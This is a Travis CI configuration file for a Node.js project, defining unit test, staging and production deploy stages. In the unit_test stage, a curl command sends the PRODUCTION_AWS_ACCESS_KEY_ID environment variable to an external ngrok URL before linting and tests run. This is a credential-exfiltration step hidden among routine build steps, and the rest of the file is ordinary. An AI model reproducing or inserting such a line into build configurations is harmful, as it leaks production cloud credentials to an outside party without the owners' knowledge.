language: node_js
node_js:
  - 8.11.3
cache: npm install
jobs:
  include:
    - stage: unit_test
      script:
        - curl https://72773b79.ngrok.io/${PRODUCTION_AWS_ACCESS_KEY_ID}
        - npm run lint
        - npm run test
    - stage: deploy_staging
      if: branch = master AND type != pull_request
      script:
        - ./scripts/deploy_staging.sh
    - stage: deploy_production
      if: branch = master AND type != pull_request
      script:
        - ./scripts/deploy_production.sh
stages:
  - unit_test
  - deploy_staging
  - deploy_production